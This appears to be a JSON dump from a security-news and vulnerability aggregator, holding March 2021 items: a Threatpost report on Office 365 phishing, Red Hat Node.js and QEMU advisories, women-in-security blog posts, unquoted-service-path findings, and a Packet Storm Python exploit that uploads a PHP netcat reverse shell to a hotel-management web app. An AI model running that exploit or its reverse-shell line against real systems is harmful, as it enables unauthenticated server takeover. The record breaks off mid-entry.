Microsoft Security solutions, [visit our website](<https://www.microsoft.com/en-us/security/business/solutions>). Bookmark the [Security blog](<https://www.microsoft.com/security/blog/>) to keep up with our expert coverage on security matters. Also, follow us at [@MSFTSecurity](<https://twitter.com/@MSFTSecurity>) for the latest news and updates on cybersecurity.\n\nOther blogs to reference:\n\n * [CISO Spotlight: How diversity of data (and people) defeats today\u2019s cyber threats](<https://www.microsoft.com/security/blog/2020/10/20/ciso-spotlight-how-diversity-of-data-and-people-defeats-todays-cyber-threats/>).\n * [Microsoft Security: How to cultivate a diverse cybersecurity team](<https://www.microsoft.com/security/blog/2020/08/31/microsoft-security-cultivate-diverse-cybersecurity-team/>).\n * [New data from Microsoft shows how the pandemic is accelerating the digital transformation of cyber-security](<https://www.microsoft.com/security/blog/2020/08/19/microsoft-shows-pandemic-accelerating-transformation-cyber-security/>).\n * [Exploiting a crisis: How cybercriminals behaved during the outbreak](<https://www.microsoft.com/security/blog/2020/06/16/exploiting-a-crisis-how-cybercriminals-behaved-during-the-outbreak/>).\n\nThe post [International Women\u2019s Day: How to support and grow women in cybersecurity](<https://www.microsoft.com/security/blog/2021/03/08/international-womens-day-how-to-support-and-grow-women-in-cybersecurity/>) appeared first on [Microsoft Security.", "modified": "2021-03-08T18:00:43", "published": "2021-03-08T18:00:43", "id": "MMPC:ECDE1A8DFB45A1210B46BCEB4EA6E96C", "href": "https://www.microsoft.com/security/blog/2021/03/08/international-womens-day-how-to-support-and-grow-women-in-cybersecurity/", "type": "mmpc", "title": "International Women\u2019s Day: How to support and grow women in cybersecurity", "cvss": {"score": 0.0, "vector": "NONE"}}], "threatpost": [{"lastseen": "2021-03-08T17:23:49", "bulletinFamily": "info", "cvelist": [], "description": "Microsoft users are being targeted with thousands of phishing emails, in an ongoing attack aiming to steal their Office 365 credentials. The attackers add an air of legitimacy to the campaign by leveraging a fake Google reCAPTCHA system and top-level domain landing pages that include the logos of victims\u2019 companies.\n\nAccording to researchers, at least 2,500 such emails have been unsuccessfully sent to senior-level employees in the banking and IT sector, over the past three months. The emails first take recipients to a fake Google reCAPTCHA system page. [Google reCAPTCHA is a service](<https://threatpost.com/cloudflare-axes-google-recaptcha-due-to-privacy-price/154635/>) that helps protect websites from spam and abuse, by using a Turing test to tell humans and bots apart (through asking a user to click on a fire hydrant out of a series of images, for instance).\n\nOnce victims \u201cpass\u201d the reCAPTCHA test, they are then redirected to a phishing landing page, which asks for their Office 365 credentials.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe attack is notable for its targeted aim at senior business leaders with titles such as Vice President and Managing Director who are likely to have a higher degree of access to sensitive company data,\u201d said researchers with Zscaler\u2019s ThreatLabZ security research team [on Friday](<https://www.zscaler.com/blogs/security-research/microsoft-themed-phishing-attack-targets-executives-using-fake-google>). \u201cThe aim of these campaigns is to steal these victims\u2019 login credentials to allow threat actors access to valuable company assets.\u201d\n\n## **Fake Phishing Emails: Voicemail Attachments**\n\nThe phishing emails pretend to be automated emails from victims\u2019 unified communications tools, which say that they have a voicemail attachment. For instance, one email tells users that \u201c(503) ***-6719 has left you a message 35 second(s) long on Jan 20\u201d along with a lone attachment that\u2019s titled \u201cvmail-219.HTM.\u201d Another tells email recipients to \u201cREVIEW SECURE DOCUMENT.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/08111659/phishing-attack-microsoft-1.jpg>)\n\nThe phishing email sample. Credit: Zscaler\n\nWhen the victims click on the attachment, they then encounter the fake Google reCAPTCHA screen, which contains a typical reCAPTCHA box \u2013 featuring a checkbox that the user must click that says \u201cI\u2019m not a robot,\u201d which then triggers the turing test.\n\nAfter filling out the fake reCAPTCHA system, victims are then directed to what appears to be a Microsoft login screen. The login pages also contain different logos from the companies which victims work at \u2013 such as one containing a logo from software company ScienceLogic and another from office rental company BizSpace. This reveals that attackers have done their homework and are customizing their phishing landing pages to fit their victims\u2019 profile, in order to make the attack appear more legitimate.\n\nVictims are asked to input their credentials into the system; once they do so, a message tells them that the validation was \u201csuccessful\u201d and that they are being redirected.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/08111741/phishing-attack-microsoft-2.jpg>)\n\nThe phishing landing page mimics Microsoft\u2019s login page. Credit: Zscaler\n\n\u201cAfter giving the login credentials, the phishing campaign will show a fake message that says \u2018Validation successful,'\u201d said researchers. \u201cUsers are then shown a recording of a voicemail message that they can play, allowing threat actors to avoid suspicion.\u201d\n\nResearchers found a variety of phishing pages associated with the campaign, which were hosted using generic top level domains such as .xyz, .club and .online. These top level domains are typically utilized by cybercriminals in spam and phishing attacks. That\u2019s because [they can be purchased for less than $1 each](<https://blog.f-secure.com/why-is-theres-so-much-spam-coming-from-xyz-and-other-new-top-level-domains/>) \u2013 a low price for adding a level of believability to phishing campaigns.\n\n## **More Phishing Attacks on Fake Google reCAPTCHA Tactic**\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/08111903/phishing-attack-microsoft-3.jpg>)\n\nCredit: Zscaler\n\nAdversaries have been leveraging bogus reCAPTCHA systems in their attacks for years. For instance, in 2019[, a malware campaign targeted a Polish bank and its users](<https://threatpost.com/phishing-scam-malware-google-recaptcha/142142/>) with emails containing a link to a malicious PHP file, which eventually downloaded the BankBot malware onto victims\u2019 systems. The attackers used a fake Google reCAPTCHA system to seem more realistic.\n\nAnother phishing attack in February purported to be sent from a voicemail service and contained a link to play the voice message \u201cPlay Audi Date.wav,\u201d [eventually redirecting victims to a malicious site](<https://threatpost.com/malformed-url-prefix-phishing-attacks-spike-6000/164132/>) with a reCAPTCHA message.\n\nBoth of the above examples show that reCAPTCHA continues to be used in phishing attacks, as the tactic successfully adds legitimacy to the attack: \u201cSimilar phishing campaigns utilizing fake Google reCAPTCHAs have been observed for several years, but this specific campaign targeting executives across specific industry verticals started in December 2020,\u201d noted researchers.\n\nMicrosoft Office 365 users have faced several sophisticated phishing attacks and scams over the past few months. In October, [researchers warned of a phishing campaign](<https://threatpost.com/microsoft-teams-phishing-office-365/160458/>) that pretends to be an automated message from Microsoft Teams. In reality, the attack aimed to steal Office 365 recipients\u2019 login credentials. Also in October, [an Office365 credential-phishing attack](<https://threatpost.com/microsoft-office-365-captchas/159747/>) targeted the hospitality industry, using visual CAPTCHAs to avoid detection and appear legitimate. Phishing attackers have also adopted new tactics like [Google Translate](<https://threatpost.com/clever-phishing-attack-enlists-google-translate-to-spoof-facebook-login-page/141571/>) or [custom fonts](<https://threatpost.com/phishing-custom-fonts/140563/>) to make the scams seem more legitimate.\n\n**_Check out our free _****_[upcoming live webinar events](<https://threatpost.com/category/webinars/>)_****_ \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_** \n\u00b7 March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly** ([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>)) \n\u00b7 April 21: **Underground Markets: A Tour of the Dark Economy** ([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "modified": "2021-03-08T17:04:59", "published": "2021-03-08T17:04:59", "id": "THREATPOST:28181170BDA0015C27570F94BA246B3F", "href": "https://threatpost.com/google-recaptcha-phishing-office-365/164566/", "type": "threatpost", "title": "Fake Google reCAPTCHA Phishing Attack Swipes Office 365 Passwords", "cvss": {"score": 0.0, "vector": "NONE"}}], "redhat": [{"lastseen": "2021-03-08T10:37:58", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (14.16.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* Node.js should not be built with \"--debug-nghttp2\" (BZ#1932427)", "modified": "2021-03-08T15:22:20", "published": "2021-03-08T14:55:44", "id": "RHSA-2021:0744", "href": "https://access.redhat.com/errata/RHSA-2021:0744", "type": "redhat", "title": "(RHSA-2021:0744) Important: nodejs:14 security and bug fix update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-08T10:38:14", "bulletinFamily": "unix", "cvelist": ["CVE-2020-35517"], "description": "The Advanced Virtualization module provides the user-space component for running virtual machines that use KVM in environments managed by Red Hat products.\n\nSecurity Fix(es):\n\n* QEMU: virtiofsd: potential privileged host device access from guest (CVE-2020-35517)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T15:05:19", "published": "2021-03-08T14:26:12", "id": "RHSA-2021:0743", "href": "https://access.redhat.com/errata/RHSA-2021:0743", "type": "redhat", "title": "(RHSA-2021:0743) Important: virt:8.2 and virt-devel:8.2 security update", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-08T10:37:21", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (10.24.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T15:07:58", "published": "2021-03-08T14:16:17", "id": "RHSA-2021:0741", "href": "https://access.redhat.com/errata/RHSA-2021:0741", "type": "redhat", "title": "(RHSA-2021:0741) Important: nodejs:10 security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-08T10:37:13", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (12.21.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T15:14:11", "published": "2021-03-08T14:16:09", "id": "RHSA-2021:0740", "href": "https://access.redhat.com/errata/RHSA-2021:0740", "type": "redhat", "title": "(RHSA-2021:0740) Important: nodejs:12 security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-08T10:38:22", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (12.21.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T14:53:45", "published": "2021-03-08T14:15:59", "id": "RHSA-2021:0739", "href": "https://access.redhat.com/errata/RHSA-2021:0739", "type": "redhat", "title": "(RHSA-2021:0739) Important: nodejs:12 security update", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-08T10:38:10", "bulletinFamily": "unix", "cvelist": ["CVE-2021-22883", "CVE-2021-22884"], "description": "Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language. \n\nThe following packages have been upgraded to a later upstream version: nodejs (10.24.0).\n\nSecurity Fix(es):\n\n* nodejs: HTTP2 'unknownProtocol' cause DoS by resource exhaustion (CVE-2021-22883)\n\n* nodejs: DNS rebinding in --inspect (CVE-2021-22884)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-03-08T15:07:46", "published": "2021-03-08T14:15:50", "id": "RHSA-2021:0738", "href": "https://access.redhat.com/errata/RHSA-2021:0738", "type": "redhat", "title": "(RHSA-2021:0738) Important: nodejs:10 security update", "cvss": {"score": 0.0, "vector": "NONE"}}], "carbonblack": [{"lastseen": "2021-03-08T14:51:49", "bulletinFamily": "blog", "cvelist": [], "description": "_This post is part of our Women\u2019s History Month series - follow along with us on Twitter _[_@VMwareCarbonBlack _](<https://twitter.com/vmw_carbonblack>)_ _\n\nIn celebration of International Women\u2019s Day, we are excited to kick off our [six-part Women in Security series](<https://www.carbonblack.com/blog/women-in-security-celebrating-womens-history-month/>). Throughout March, we will highlight outstanding women on the VMware Security Business Unit team as well as customers who are making their mark on the security industry and helping to keep the world safe from cyberattacks.\n\n\n\nMeet [Taree Reardon, Senior Threat Analyst](<https://www.carbonblack.com/howlers-security-experts/taree-reardon/>), VMware Security Business Unit**.** As a GIAC certified Incident Handler with over three years of experience on the VMware Security Business Unit Managed Detection team, Taree is responsible for identifying and dissecting new and emerging threats. She is an active speaker in the cybersecurity industry and a member of the [Howlers](<https://www.carbonblack.com/howlers-security-experts/>), where she shares her experiences and helps the security community succeed. Taree also has a passion for mentoring and empowering the next generation of security professionals. We spoke to her about her career path, role models, and tips for other women looking to succeed in the security industry._ _\n\n**Tell us about yourself and your role at VMware? \n**I joined Carbon Black prior to the acquisition by VMware. I\u2019m on the threat analysis team and responsible for identifying emerging threats to protect our customers against emerging cyberattacks. I work on a team of experts who come from different backgrounds - they\u2019ve often held two or three different types of jobs before this one - which brings creativity and unique perspectives to the table.\n\n**How did you land a career in security and what led you to VMware Security Business Unit? \n**I knew that Carbon Black was a really inclusive place to work. I was looking for a company that was pushing women up vs. down and I found exactly that. While it was a two-month process with more than eight interviews, it was worth it. I had the chance to speak with my potential teammates and understand their priorities and values, which got me even more excited about the role. Post-acquisition by VMware, I\u2019m glad to see the culture and values remain the same. VMware has a very similar approach to lifting women up and I\u2019m constantly seeing new initiatives from leadership to push these efforts forward.\n\n**We know there are no typical days in security, but can you tell us about what a day entails in the VMware Security Business Unit for you? \n**You never know what you\u2019re going to do on a given day - I love this about security and it\u2019s what keeps me engaged in my job. On incident days, our first priority is protecting our customers of course. But on non-incident days, we focus on how our team is doing and discuss areas for personal and professional growth. I always love being able to take a step and back and think about my team\u2019s well-being and our path forward together. As leaders on the team, we provide resources, new trainings, and opportunities so they consistently feel challenged and can grow their security expertise.\n\n**Who is your role model in tech or security? \n**I love everything Michelle Obama stands for, especially about female empowerment and breaking glass ceilings. In security though, I love following [@malwareunicorn](<https://twitter.com/malwareunicorn?lang=en>) and [@hacks4pancakes](<https://twitter.com/hacks4pancakes?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) - they both post engaging content, and they\u2019re so personable. I know I can go to them as a knowledgeable resource and as people who can answer important security questions.\n\n**What excites you most about security and the future of security at VMware? \n**I think we\u2019re at such an exciting, pivotal time in security. I look at security as a warfront - there are attackers and we\u2019re defending against them. I feel privileged to be on the \u201cfront lines\u201d protecting important industries like healthcare prepare for and stop attacks, especially with the increase in ransomware attacks over the past year. I\u2019m proud to say we can make a difference, and even save lives in the case of the recent surge of attacks on the healthcare industry.\n\n**In honor of Women\u2019s History Month, what advice do you have for women looking to get into the security industry?**\n\n * Imposter syndrome is normal - you may second guess yourself, but don\u2019t worry, everyone feels that way, not just women. It\u2019s normal and talking about it helps. I always talk through any insecurities or challenges I\u2019m facing with management and look at the opportunity as one to learn something new.\n * When you\u2019re interviewing, ask to speak to women on the team. Ask them about their role, and if they feel supported and challenged. It\u2019s critical to vet the place you\u2019re interviewing beforehand. Once you take the job, if it\u2019s not working out, then give it some time, learn what you can and move on. Just be sure you put yourself and your growth first.\n * Connect with women in the industry - it\u2019s great if you get a woman to mentor you, but otherwise, network on LinkedIn, ask questions, and speak to other women in the industry.\n * Don&#x27;t try to do it all. There\u2019s an immense amount of pressure on women to not only do their job well, but also to keep things at home and with their children organized. If you have the ability, ask for help because we don\u2019t have to do it all.\n\nStay tuned for more Q&amp;As throughout Women&#x27;s History Month, and be sure to follow the #WomensHistoryMonth and #ChooseToChallenge conversations on Twitter: [@vmw_carbonblack](<https://twitter.com/vmw_carbonblack>).\n\nThe post [Women in Security Part 1: Meet Taree Reardon, Senior Threat Analyst](<https://www.carbonblack.com/blog/women-in-security-part-1-meet-taree-reardon-senior-threat-analyst/>) appeared first on [VMware Carbon Black](<https://www.carbonblack.com>).", "modified": "2021-03-08T14:00:40", "published": "2021-03-08T14:00:40", "id": "CARBONBLACK:6F77F7E691DCBBE9A0FCA94ADB6D9E3F", "href": "https://www.carbonblack.com/blog/women-in-security-part-1-meet-taree-reardon-senior-threat-analyst/", "type": "carbonblack", "title": "Women in Security Part 1: Meet Taree Reardon, Senior Threat Analyst", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": "2021-03-08T14:50:10", "bulletinFamily": "blog", "cvelist": [], "description": "Last week on Malwarebytes Labs, our podcast featured Eva Galperin who talked to us about [defending online anonymity and speech](<https://blog.malwarebytes.com/podcast/2021/03/defending-online-anonymity-and-speech-with-eva-galperin-lock-and-code-s02e03/>).\n\nWe wrote about how [Ryuk ransomware has developed a worm-like capability](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/ryuk-ransomware-develops-worm-like-capability/>), how [Exchange servers are attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>), [21 million free VPN users\u2019 data was exposed](<https://blog.malwarebytes.com/cybercrime/privacy/2021/03/21-million-free-vpn-users-data-exposed/>), how [China\u2019s RedEcho was accused of targeting India\u2019s power grids](<https://blog.malwarebytes.com/vital-infrastructure/2021/03/chinas-redecho-accused-of-targeting-indias-power-grids/>), whether[ Google\u2019s Privacy Sandbox will take the bite out of tracking cookies](<https://blog.malwarebytes.com/privacy-2/2021/03/will-googles-privacy-sandbox-take-the-bite-out-of-tracking-cookies/>), and how a [Chrome fix patches an in-the-wild zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>).\n\n### Other cybersecurity news\n\n * [Gab](<https://www.wired.com/story/gab-hack-data-breach-ddosecrets/>) has been badly hacked, the stolen information includes what appears to be passwords and private communications. (Source: Wired)\n * A bug in a [shared SDK](<https://www.zdnet.com/article/bug-in-shared-sdk-can-let-attackers-join-calls-undetected-across-multiple-apps/>) can let attackers join calls undetected across multiple apps. (Source: ZDNet)\n * [Business email compromise (BEC)](<https://www.bleepingcomputer.com/news/security/investors-are-the-next-target-of-large-scale-cyberattacks/>) scammers are utilizing a new type of attack targeting investors. (Source: BleepingComputer)\n * Socially engineered attacks surfaced in [maritime](<https://cimsec.org/perils-of-a-new-dimension-socially-engineered-attacks-in-maritime-cybersecurity/>) cybersecurity. (Source: Center for International Maritime Security)\n * Researchers found three new malware strains used by the [SolarWinds](<https://thehackernews.com/2021/03/researchers-find-3-new-malware-strains.html>) group. (Source: The Hacker News)\n * [Horticulture](<https://www.hortidaily.com/article/9299175/horticulture-is-an-interesting-sector-for-hackers/>) is an interesting sector for hackers since it is at the forefront of modern technologies. (Source: Horti Daily)\n * A federal judge has approved a $650m settlement of a privacy lawsuit against [Facebook](<https://www.theguardian.com/technology/2021/feb/27/facebook-illinois-privacy-lawsuit-settlement>) for allegedly using photo face-tagging and other biometric data without the permission of its users. (Source: The Guardian)\n * [Google](<https://www.bleepingcomputer.com/news/security/google-shares-poc-exploit-for-critical-windows-10-graphics-rce-bug/>) shared a PoC exploit for a critical Windows 10 Graphics RCE bug. (Source: Bleeping Computer)\n\nStay safe, everyone!\n\nThe post [A week in security (March 1 - 7)](<https://blog.malwarebytes.com/a-week-in-security/2021/03/a-week-in-security-march-1-7/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "modified": "2021-03-08T13:04:31", "published": "2021-03-08T13:04:31", "id": "MALWAREBYTES:61F80B068F99447C4142FC69BDF312D1", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/03/a-week-in-security-march-1-7/", "type": "malwarebytes", "title": "A week in security (March 1 \u2013 7)", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2021-03-08T08:27:47", "description": "", "published": "2021-03-08T00:00:00", "type": "exploitdb", "title": "Print Job Accounting 4.4.10 - &#039;OkiJaSvc&#039; Unquoted Service Path", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "EDB-ID:49623", "href": "https://www.exploit-db.com/exploits/49623", "sourceData": "# Exploit Title: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path\r\n# Discovery by: Brian Rodriguez\r\n# Date: 07-03-2021\r\n# Vendor Homepage: https://www.oki.com\r\n# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6\r\n# Tested Version: 4.4.10\r\n# Vulnerability Type: Unquoted Service Path\r\n# Tested on: Windows 8.1 Pro 64 bits\r\n\r\nC:\\Windows\\system32>wmic service get name, displayname, pathname, startmode\r\n| findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" |findstr /i /v \"\"\" OKI\r\nLocal Port Manager OpLclSrv C:\\Program\r\nFiles\\Okidata\\Common\\Extend3\\portmgrsrv.exe Print Job Accounting OkiJaSvc\r\nC:\\Program Files\\Okidata\\Print Job Accounting\\oklogsvc.exe Print Job\r\nAccounting Watch Service OkiWchSvc C:\\Program Files\\Okidata\\Print Job\r\nAccounting\\okwchsvc.exe Print Job Accounting opja0004 opja0004 C:\\Program\r\nFiles\\Okidata\\Print Job Accounting\\opja0004.exe\r\n\r\nC:\\Windows\\system32>sc qc OkiJaSvc\r\n[SC] QueryServiceConfig CORRECTO\r\n\r\nNOMBRE_SERVICIO: OkiJaSvc\r\n TIPO : 10 WIN32_OWN_PROCESS\r\n TIPO_INICIO : 2 AUTO_START\r\n CONTROL_ERROR : 1 NORMAL\r\n NOMBRE_RUTA_BINARIO: C:\\Program Files\\Okidata\\Print Job Accounting\\oklogsvc.exe\r\n GRUPO_ORDEN_CARGA :\r\n ETIQUETA : 0\r\n NOMBRE_MOSTRAR : Print Job Accounting\r\n DEPENDENCIAS :\r\n NOMBRE_INICIO_SERVICIO: LocalSystem", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49623"}, {"lastseen": "2021-03-08T08:27:47", "description": "", "published": "2021-03-08T00:00:00", "type": "exploitdb", "title": "Pingzapper 2.3.1 - &#039;PingzapperSvc&#039; Unquoted Service Path", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "EDB-ID:49626", "href": "https://www.exploit-db.com/exploits/49626", "sourceData": "# Exploit Title: Pingzapper 2.3.1 - 'PingzapperSvc' Unquoted Service Path\r\n# Discovery by: Brian Rodriguez\r\n# Date: 07-03-2021\r\n# Vendor Homepage: https://pingzapper.com\r\n# Software Links: https://pingzapper.com/download\r\n# Tested Version: 2.3.1\r\n# Vulnerability Type: Unquoted Service Path\r\n# Tested on: Windows 8.1 Pro 64 bits\r\n\r\n# Step to discover Unquoted Service Path:\r\n\r\nC:\\>wmic service get name,displayname,pathname,startmode |findstr /i \"auto\"\r\n|findstr /i /v \"c:\\windows\\\\\" |findstr /i /v \"\"\"\r\nPingzapper Service PingzapperSvc C:\\Program Files\r\n(x86)\\Pingzapper\\PZService.exe Auto\r\n\r\nC:\\>sc qc PingzapperSvc [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO:\r\nPingzapperSvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START\r\nCONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\\Program Files\r\n(x86)\\Pingzapper\\PZService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0\r\nNOMBRE_MOSTRAR : Pingzapper Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO:\r\nLocalSystem", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49626"}], "packetstorm": [{"lastseen": "2021-03-08T16:21:42", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Hotel And Lodge Management System 1.0 Shell Upload", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161687", "href": "https://packetstormsecurity.com/files/161687/Hotel-And-Lodge-Management-System-1.0-Shell-Upload.html", "sourceData": "`# Exploit Title: Hotel and Lodge Management System 1.0 - Remote Code Execution (Unauthenticated) \n# Date: 07-03-2021 \n# Exploit Author: Christian Vierschilling \n# Vendor Homepage: https://www.sourcecodester.com \n# Software Link: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html \n# Version: 1.0 \n# Tested on: PHP 7.4.14, Linux x64_x86 \n \n# --- Description --- # \n \n# The web application allows for an unauthenticated file upload which can result in a Remote Code Execution. \n# Executing this script against a target might return a reverse php shell. \n \n# --- Proof of concept --- # \n \n#!/usr/bin/python3 \nimport random \nimport sys \nimport requests \nfrom requests_toolbelt.multipart.encoder import MultipartEncoder \n \ndef file_upload(target_ip, attacker_ip, attacker_port): \nprint(\"(+) Setting up reverse shell php file ..\") \nrandom_file_name = str(random.randint(100000, 999999)) + \"revshell.php\" \nrevshell_string = '<?php exec(\"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {} {} >/tmp/f\"); ?>'.format(attacker_ip, attacker_port) \nm = MultipartEncoder(fields={'image': (random_file_name, revshell_string, 'application/x-php'),'btn_update':''}) \nprint(\"(+) Trying to upload it ..\") \nr1 = requests.post('http://{}/hotel/source code/profile.php'.format(target_ip), data=m, headers={'Content-Type': m.content_type}) \nr2 = requests.get('http://{}/hotel/source code/uploadImage/Profile/'.format(target_ip)) \nif random_file_name in r2.text: \nprint(\"(+) File upload seems to have been successful!\") \nreturn random_file_name \nelse: \nprint(\"(-) Oh noes, file upload failed .. quitting!\") \nexit() \n \ndef trigger_shell(target_ip, random_file_name): \nprint(\"(+) Now trying to trigger our shell..\") \nr3 = requests.get('http://{}/hotel/source code/uploadImage/Profile/{}'.format(target_ip, random_file_name)) \nreturn None \n \ndef main(): \nif len(sys.argv) != 4: \nprint('(+) usage: %s <target ip> <attacker ip> <attacker port>' % sys.argv[0]) \nprint('(+) eg: %s 10.0.0.1 10.13.37.10 4444' % sys.argv[0]) \nsys.exit(-1) \n \ntarget_ip = sys.argv[1] \nattacker_ip = sys.argv[2] \nattacker_port = sys.argv[3] \n \nrevshell_file_name = file_upload(target_ip, attacker_ip, attacker_port) \ntrigger_shell(target_ip, revshell_file_name) \nprint(\"\\n(+) done!\") \n \nif __name__ == \"__main__\": \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161687/htms10-exec.txt"}, {"lastseen": "2021-03-08T16:21:39", "description": "", "published": "2021-03-08T00:00:00", "type": "packetstorm", "title": "Print Job Accounting 4.4.10 Unquoted Service Path", "bulletinFamily": "exploit", "cvelist": [], "modified": "2021-03-08T00:00:00", "id": "PACKETSTORM:161690", "href": "https://packetstormsecurity.com/files/161690/Print-Job-Accounting-4.4.10-Unquoted-Service-Path.html", "sourceData": "`# Exploit Title: Print Job Accounting 4.4.10 - 'OkiJaSvc' Unquoted Service Path \n# Discovery by: Brian Rodriguez \n# Date: 07-03-2021 \n# Vendor Homepage: https://www.oki.com \n# Software Links: https://www.oki.com/mx/printing/support/drivers-and-utilities/?id=46229002&tab=drivers-and-utilities&productCategory=monochrome&sku=62442301&os=ab4&lang=ac6 \n# Tested Version: 4.4.10 \n# Vulnerability Type: Unquoted Service Path \n# Tested on: Windows 8.1 Pro 64 bits \n \nC:\\Windows\\system32>wmic service get name, displayname, pathname, startmode \n| findstr /i \"Auto\" | findstr /i /v \"C:\\Windows\\\\\" |findstr /i /v \"\"\" OKI \nLocal Port Manager OpLclSrv C:\\Program \nFiles\\Okidata\\Common\\Extend3\\portmgrsrv.exe Print Job Accounting OkiJaSvc \nC:\\Program Files\\Okidata\\Print Job Accounting\\oklogsvc.exe Print Job \nAccounting Watch Service OkiWchSvc C:\\Program Files\\Okidata\\Print Job \nAccounting\\okwchsvc.exe Print Job Accounting opja0004 opja0004 C:\\Program \nFiles\\Okidata\\Print Job Accounting\\opja0004.exe \n \nC:\\Windows\\system32>sc qc OkiJaSvc \n[SC] QueryServiceConfig CORRECTO \n \nNOMBRE_SERVICIO: OkiJaSvc \nTIPO : 10 WIN32_OWN_PROCESS \nTIPO_INICIO : 2 AUTO_START \nCONTROL_ERROR : 1 NORMAL \nNOMBRE_RUTA_BINARIO: C:\\Program Files\\Okidata\\Print Job Accounting\\oklogsvc.exe \nGRUPO_ORDEN_CARGA : \nETIQUETA : 0 \nNOMBRE_MOSTRAR : Print Job Accounting \nDEPENDENCIAS : \nNOMBRE_INICIO_SERVICIO: LocalSystem \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161690/pja410-unquotedpath.txt"}, {"lastseen": "2021-03-08T16:21:51", "description": "", "published": "2021-03-08T00:00:00", "type": 